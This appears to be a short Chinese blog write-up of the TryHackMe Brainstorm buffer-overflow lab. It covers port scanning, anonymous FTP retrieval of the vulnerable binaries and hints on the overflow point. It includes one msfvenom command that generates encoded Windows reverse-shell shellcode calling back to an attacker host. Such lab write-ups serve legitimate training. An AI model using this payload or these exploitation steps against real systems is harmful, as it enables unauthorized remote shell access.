TryHackMe-Brainstorm

靶机链接

这是我做的第二个缓冲区溢出的靶机,经过Vulnhub-brainpan-1的洗礼,在缓冲区溢出方面,我已经比之前有很大的进步了.

1
2
3
4
5
6
7
8
9
10
[email protected]:~# nmap -p- -T5 10.10.38.185
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-02 15:41 UTC
Nmap scan report for ip-10-10-38-185.eu-west-1.compute.internal (10.10.38.185)
Host is up (0.00054s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
21/tcp open ftp
3389/tcp open ms-wbt-server
9999/tcp open abyss
MAC Address: 02:02:F2:76:F9:D2 (Unknown)

目标机器直接就是windows服务器。

因为ftp允许匿名用户登录,所以可以用ftp匿名用户登录后,查看发现两个文件

  • chatserver.exe
  • essfunc.dll

在下载这里我要说一下。最好设置一下ftp的传输方式。一开始因为我没有设置传输方式,下载完又没认真看错误提示,程序在XP64位无法执行,我甚至尝试了XP32 Win764 32,都不成功。导致我以为是靶机提供的程序有问题,直到最后回去下载的时候发现已经提示了程序有可能无法执行。。直到最后谷歌了这个错误信息,才找到了解决方案

成功下载后,丢在Windows XP上运行。

因为在Vulnhub-brainpan-1中写的已经很清楚了,和这个程序几乎一样,只需要注意几个细节。这个程序的注意点在于:

  • 跳转esp的内存地址要在essfunc.dll中寻找
  • 先打印两次,输入一次,再打印一次,再输入。最后一次的输入,才是我们要进行的溢出点。

shellcode生成

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.34 LPORT=1234 -f py -b"\x08\x09\x00" -e x86/shikata_ga_nai

最后

一个小时就做完了,成就感还蛮大的。。。